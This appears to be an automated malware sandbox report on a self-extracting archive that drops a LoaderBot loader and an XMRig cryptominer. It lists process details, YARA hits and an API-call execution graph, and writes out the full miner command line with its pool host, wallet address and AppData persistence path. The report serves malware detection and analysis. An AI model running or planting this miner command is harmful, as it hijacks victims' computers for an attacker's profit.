                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "
                                                                              Imagebase:0x7ff7af880000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:05:31:02
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:3
                                                                              Start time:05:31:02
                                                                              Start date:23/06/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:rolex.exe -priverdD
                                                                              Imagebase:0x7ff7ab490000
                                                                              File size:4'605'877 bytes
                                                                              MD5 hash:8866D677A3309A0AD903F37557C5941B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_LoaderBot, Description: Yara detected LoaderBot, Source: 00000003.00000003.1726307942.000001FEAC072000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 8%, ReversingLabs
                                                                              • Detection: 14%, Virustotal, Browse
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:4
                                                                              Start time:05:31:03
                                                                              Start date:23/06/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe"
                                                                              Imagebase:0x690000
                                                                              File size:4'157'440 bytes
                                                                              MD5 hash:BD2413C32E34D0031F7881D51AE731FF
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_LoaderBot, Description: Yara detected LoaderBot, Source: 00000004.00000000.1730928897.0000000000692000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_LoaderBot, Description: Yara detected LoaderBot, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, Author: Joe Security
                                                                              • Rule: MALWARE_Win_CoinMiner04, Description: Detects coinmining malware, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe, Author: ditekSHen
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 67%, Virustotal, Browse
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:5
                                                                              Start time:05:31:10
                                                                              Start date:23/06/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                                                                              Imagebase:0x140000000
                                                                              File size:4'141'064 bytes
                                                                              MD5 hash:02569A7A91A71133D4A1023BF32AA6F4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000005.00000002.1804831542.00000000004A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                              • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000005.00000002.1805223166.0000000140001000.00000040.00000001.01000000.0000000D.sdmp, Author: unknown
                                                                              Antivirus matches:
                                                                              • Detection: 61%, ReversingLabs
                                                                              • Detection: 68%, Virustotal, Browse
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:6
                                                                              Start time:05:31:10
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:7
                                                                              Start time:05:31:10
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                              Imagebase:0x7ff6eef20000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:8
                                                                              Start time:05:31:10
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WerFault.exe -pss -s 436 -p 7280 -ip 7280
                                                                              Imagebase:0x7ff6563e0000
                                                                              File size:570'736 bytes
                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:9
                                                                              Start time:05:31:10
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 7280 -s 764
                                                                              Imagebase:0x7ff6563e0000
                                                                              File size:570'736 bytes
                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:10
                                                                              Start time:05:31:11
                                                                              Start date:23/06/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                                                                              Imagebase:0x140000000
                                                                              File size:4'141'064 bytes
                                                                              MD5 hash:02569A7A91A71133D4A1023BF32AA6F4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000A.00000002.2583502346.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:11
                                                                              Start time:05:31:11
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:12
                                                                              Start time:05:31:15
                                                                              Start date:23/06/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe"
                                                                              Imagebase:0x180000
                                                                              File size:4'157'440 bytes
                                                                              MD5 hash:BD2413C32E34D0031F7881D51AE731FF
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:16
                                                                              Start time:05:31:26
                                                                              Start date:23/06/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe"
                                                                              Imagebase:0x9f0000
                                                                              File size:4'157'440 bytes
                                                                              MD5 hash:BD2413C32E34D0031F7881D51AE731FF
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:17
                                                                              Start time:05:31:37
                                                                              Start date:23/06/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe"
                                                                              Imagebase:0x240000
                                                                              File size:4'157'440 bytes
                                                                              MD5 hash:BD2413C32E34D0031F7881D51AE731FF
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:19
                                                                              Start time:05:32:28
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WerFault.exe -pss -s 208 -p 7440 -ip 7440
                                                                              Imagebase:0x7ff768d90000
                                                                              File size:570'736 bytes
                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:20
                                                                              Start time:05:32:28
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 7440 -s 552
                                                                              Imagebase:0x7ff768d90000
                                                                              File size:570'736 bytes
                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:21
                                                                              Start time:05:32:30
                                                                              Start date:23/06/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                                                                              Imagebase:0x140000000
                                                                              File size:4'141'064 bytes
                                                                              MD5 hash:02569A7A91A71133D4A1023BF32AA6F4
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000002.3029846124.0000000000656000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000015.00000002.3029846124.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:22
                                                                              Start time:05:32:30
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:23
                                                                              Start time:05:33:12
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WerFault.exe -pss -s 548 -p 7424 -ip 7424
                                                                              Imagebase:0x7ff768d90000
                                                                              File size:570'736 bytes
                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:24
                                                                              Start time:05:33:13
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 7424 -s 876
                                                                              Imagebase:0x7ff768d90000
                                                                              File size:570'736 bytes
                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:25
                                                                              Start time:05:33:15
                                                                              Start date:23/06/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                                                                              Imagebase:0x140000000
                                                                              File size:4'141'064 bytes
                                                                              MD5 hash:02569A7A91A71133D4A1023BF32AA6F4
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000019.00000002.3336155249.0000000000611000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:26
                                                                              Start time:05:33:15
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:27
                                                                              Start time:05:33:43
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WerFault.exe -pss -s 508 -p 1712 -ip 1712
                                                                              Imagebase:0x7ff768d90000
                                                                              File size:570'736 bytes
                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:28
                                                                              Start time:05:33:43
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\WerFault.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 1712 -s 864
                                                                              Imagebase:0x7ff768d90000
                                                                              File size:570'736 bytes
                                                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:29
                                                                              Start time:05:33:46
                                                                              Start date:23/06/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 2
                                                                              Imagebase:0x140000000
                                                                              File size:4'141'064 bytes
                                                                              MD5 hash:02569A7A91A71133D4A1023BF32AA6F4
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.3496111858.0000000000515000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.3609636273.0000000000515000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000003.3763661932.0000000000515000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000002.4173054764.0000000000515000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001D.00000002.4172854345.0000000000491000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:30
                                                                              Start time:05:33:46
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:11.5%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:27.7%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:26
                                                                                execution_graph 25428 7ff6559503e0 25429 7ff655950497 25428->25429 25430 7ff65595041f 25428->25430 25453 7ff65593aae0 25429->25453 25432 7ff65593aae0 48 API calls 25430->25432 25434 7ff655950433 25432->25434 25468 7ff65593da98 25434->25468 25435 7ff65593da98 48 API calls 25439 7ff655950442 memcpy_s 25435->25439 25438 7ff655950541 25465 7ff65592250c 25438->25465 25441 7ff6559505cc 25439->25441 25452 7ff6559505c6 25439->25452 25460 7ff655921fa0 25439->25460 25443 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 25441->25443 25445 7ff6559505d2 25443->25445 25471 7ff655957904 25452->25471 25454 7ff65593aaf3 25453->25454 25476 7ff655939774 25454->25476 25457 7ff65593ab58 LoadStringW 25458 7ff65593ab86 25457->25458 25459 7ff65593ab71 LoadStringW 25457->25459 25458->25435 25459->25458 25461 7ff655921fdc 25460->25461 25462 7ff655921fb3 25460->25462 25461->25438 25462->25461 25463 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 25462->25463 25464 7ff655922000 25463->25464 25466 7ff655922516 SetDlgItemTextW 25465->25466 25467 7ff655922513 25465->25467 25467->25466 25513 7ff65593d874 25468->25513 25606 7ff65595783c 31 API calls 2 library calls 25471->25606 25473 7ff65595791d 25607 7ff655957934 16 API calls abort 25473->25607 25483 7ff655939638 25476->25483 25479 7ff6559397d9 25493 7ff655952320 25479->25493 25484 7ff655939692 25483->25484 25492 7ff655939730 25483->25492 25488 7ff6559396c0 25484->25488 25506 7ff655940f68 WideCharToMultiByte 25484->25506 25486 7ff655952320 _handle_error 8 API calls 25487 7ff655939764 25486->25487 25487->25479 25502 7ff655939800 25487->25502 25491 7ff6559396ef 25488->25491 25508 7ff65593aa88 45 API calls _snwprintf 25488->25508 25509 7ff65595a270 31 API calls 2 library calls 25491->25509 25492->25486 25494 7ff655952329 25493->25494 25495 7ff6559397f2 25494->25495 25496 7ff655952550 IsProcessorFeaturePresent 25494->25496 25495->25457 25495->25458 25497 7ff655952568 25496->25497 25510 7ff655952744 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 25497->25510 25499 7ff65595257b 25511 7ff655952510 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 25499->25511 25503 7ff655939840 25502->25503 25505 7ff655939869 25502->25505 25512 7ff65595a270 31 API calls 2 library calls 25503->25512 25505->25479 25507 7ff655940faa 25506->25507 25507->25488 25508->25491 25509->25492 25510->25499 25512->25505 25529 7ff65593d4d0 25513->25529 25518 7ff65593d8e5 _snwprintf 25525 7ff65593d974 25518->25525 25543 7ff655959ef0 25518->25543 25570 7ff655929d78 33 API calls 25518->25570 25519 7ff65593d9a3 25521 7ff65593da17 25519->25521 25524 7ff65593da3f 25519->25524 25522 7ff655952320 _handle_error 8 API calls 25521->25522 25523 7ff65593da2b 25522->25523 25523->25439 25526 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 25524->25526 25525->25519 25571 7ff655929d78 33 API calls 25525->25571 25527 7ff65593da44 25526->25527 25530 7ff65593d665 25529->25530 25532 7ff65593d502 25529->25532 25533 7ff65593cb80 25530->25533 25531 7ff655921744 33 API calls 25531->25532 25532->25530 25532->25531 25535 7ff65593cbb6 25533->25535 25540 7ff65593cc80 25533->25540 25537 7ff65593cc7b 25535->25537 25538 7ff65593cc20 25535->25538 25541 7ff65593cbc6 25535->25541 25581 7ff655921f80 33 API calls 3 library calls 25537->25581 25538->25541 25572 7ff6559521d0 25538->25572 25582 7ff655922004 33 API calls std::_Xinvalid_argument 25540->25582 25541->25518 25544 7ff655959f36 25543->25544 25545 7ff655959f4e 25543->25545 25594 7ff65595d69c 15 API calls _set_errno_from_matherr 25544->25594 25545->25544 25546 7ff655959f58 25545->25546 25596 7ff655957ef0 35 API calls 2 library calls 25546->25596 25549 7ff655959f3b 25595 7ff6559578e4 31 API calls _invalid_parameter_noinfo_noreturn 25549->25595 25551 7ff655952320 _handle_error 8 API calls 25553 7ff65595a10b 25551->25553 25552 7ff655959f69 memcpy_s 25597 7ff655957e70 15 API calls _set_errno_from_matherr 25552->25597 25553->25518 25555 7ff655959fd4 25598 7ff6559582f8 46 API calls 3 library calls 25555->25598 25557 7ff655959fdd 25558 7ff655959fe5 25557->25558 25559 7ff65595a014 25557->25559 25599 7ff65595d90c 25558->25599 25561 7ff65595a023 25559->25561 25562 7ff65595a092 25559->25562 25563 7ff65595a01a 25559->25563 25564 7ff65595a06c 25559->25564 25566 7ff65595d90c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 25561->25566 25562->25564 25565 7ff65595a09c 25562->25565 25563->25561 25563->25564 25567 7ff65595d90c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 25564->25567 25568 7ff65595d90c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 25565->25568 25569 7ff655959f46 25566->25569 25567->25569 25568->25569 25569->25551 25570->25518 25571->25519 25573 7ff6559521db 25572->25573 25574 7ff6559521f4 25573->25574 25577 7ff6559521fa 25573->25577 25583 7ff65595bbc0 25573->25583 25574->25541 25576 7ff655952205 25587 7ff655921f80 33 API calls 3 library calls 25576->25587 25577->25576 25586 7ff655952f7c RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 25577->25586 25580 7ff65595220b 25581->25540 25588 7ff65595bc00 25583->25588 25586->25576 25587->25580 25593 7ff65595f398 EnterCriticalSection 25588->25593 25594->25549 25595->25569 25596->25552 25597->25555 25598->25557 25600 7ff65595d911 RtlRestoreThreadPreferredUILanguages 25599->25600 25604 7ff65595d941 Concurrency::details::SchedulerProxy::DeleteThis 25599->25604 25601 7ff65595d92c 25600->25601 25600->25604 25605 7ff65595d69c 15 API calls _set_errno_from_matherr 25601->25605 25603 7ff65595d931 GetLastError 25603->25604 25604->25569 25605->25603 25606->25473 26454 7ff6559520f0 26455 7ff655952106 _com_error::_com_error 26454->26455 26460 7ff655954078 26455->26460 26457 7ff655952117 26458 7ff655951900 _com_raise_error 14 API calls 26457->26458 26459 7ff655952163 26458->26459 26461 7ff6559540b4 RtlPcToFileHeader 26460->26461 26462 7ff655954097 26460->26462 26463 7ff6559540db RaiseException 26461->26463 26464 7ff6559540cc 26461->26464 26462->26461 26463->26457 26464->26463 26495 7ff6559511cf 26496 7ff655951102 26495->26496 26497 7ff655951900 _com_raise_error 14 API calls 26496->26497 26498 7ff655951141 26497->26498 26435 7ff65595bf2c 26442 7ff65595bc34 26435->26442 26447 7ff65595d440 35 API calls 3 library calls 26442->26447 26444 7ff65595bc3f 26448 7ff65595d068 35 API calls abort 26444->26448 26447->26444 25609 7ff655952d6c 25634 7ff6559527fc 25609->25634 25612 7ff655952eb8 25732 7ff655953170 7 API calls 2 library calls 25612->25732 25613 7ff655952d88 __scrt_acquire_startup_lock 25615 7ff655952ec2 25613->25615 25617 7ff655952da6 25613->25617 25733 7ff655953170 7 API calls 2 library calls 25615->25733 25618 7ff655952dcb 25617->25618 25625 7ff655952de8 __scrt_release_startup_lock 25617->25625 25642 7ff65595cd90 25617->25642 25619 7ff655952ecd abort 25621 7ff655952e51 25646 7ff6559532bc 25621->25646 25623 7ff655952e56 25649 7ff65595cd20 25623->25649 25625->25621 25729 7ff65595c050 35 API calls __GSHandlerCheck_EH 25625->25729 25734 7ff655952fb0 25634->25734 25637 7ff65595282b 25736 7ff65595cc50 25637->25736 25638 7ff655952827 25638->25612 25638->25613 25643 7ff65595cdeb 25642->25643 25644 7ff65595cdcc 25642->25644 25643->25625 25644->25643 25753 7ff655921120 25644->25753 25796 7ff655953cf0 25646->25796 25798 7ff655960730 25649->25798 25651 7ff655952e5e 25654 7ff655950754 25651->25654 25652 7ff65595cd2f 25652->25651 25802 7ff655960ac0 35 API calls swprintf 25652->25802 25804 7ff65593dfd0 25654->25804 25658 7ff65595079a 25891 7ff65594946c 25658->25891 25660 7ff6559507a4 memcpy_s 25896 7ff655949a14 25660->25896 25662 7ff655950ddc 25664 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 25662->25664 25663 7ff65595096e GetCommandLineW 25666 7ff655950b42 25663->25666 25667 7ff655950980 25663->25667 25665 7ff655950de2 25664->25665 25670 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 25665->25670 25906 7ff655936454 25666->25906 26005 7ff65592129c 25667->26005 25669 7ff655950819 25669->25662 25669->25663 25682 7ff655950de8 25670->25682 25671 7ff655950b51 25674 7ff655921fa0 31 API calls 25671->25674 25678 7ff655950b68 memcpy_s 25671->25678 25673 7ff6559509a5 26015 7ff65594cad0 102 API calls 3 library calls 25673->26015 25674->25678 25675 7ff655921fa0 31 API calls 25679 7ff655950b93 SetEnvironmentVariableW GetLocalTime 25675->25679 25678->25675 25918 7ff655933e28 25679->25918 25681 7ff6559509af 25681->25665 25685 7ff655950adb 25681->25685 25686 7ff6559509f9 OpenFileMappingW 25681->25686 25979 7ff655951900 25682->25979 25693 7ff65592129c 33 API calls 25685->25693 25688 7ff655950a19 MapViewOfFile 25686->25688 25689 7ff655950ad0 CloseHandle 25686->25689 25688->25689 25691 7ff655950a3f UnmapViewOfFile MapViewOfFile 25688->25691 25689->25666 25691->25689 25694 7ff655950a71 25691->25694 25692 7ff655950c75 25946 7ff6559467b4 25692->25946 25696 7ff655950b00 25693->25696 26016 7ff65594a190 33 API calls 2 library calls 25694->26016 26020 7ff65594fd0c 35 API calls 2 library calls 25696->26020 25698 7ff655950a81 26017 7ff65594fd0c 35 API calls 2 library calls 25698->26017 25701 7ff655950b0a 25701->25666 25707 7ff655950dd7 25701->25707 25703 7ff6559467b4 33 API calls 25705 7ff655950c87 DialogBoxParamW 25703->25705 25704 7ff655950a90 26018 7ff65593b9b4 102 API calls 25704->26018 25712 7ff655950cd3 25705->25712 25710 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 25707->25710 25708 7ff655950aa5 26019 7ff65593bb00 102 API calls 25708->26019 25710->25662 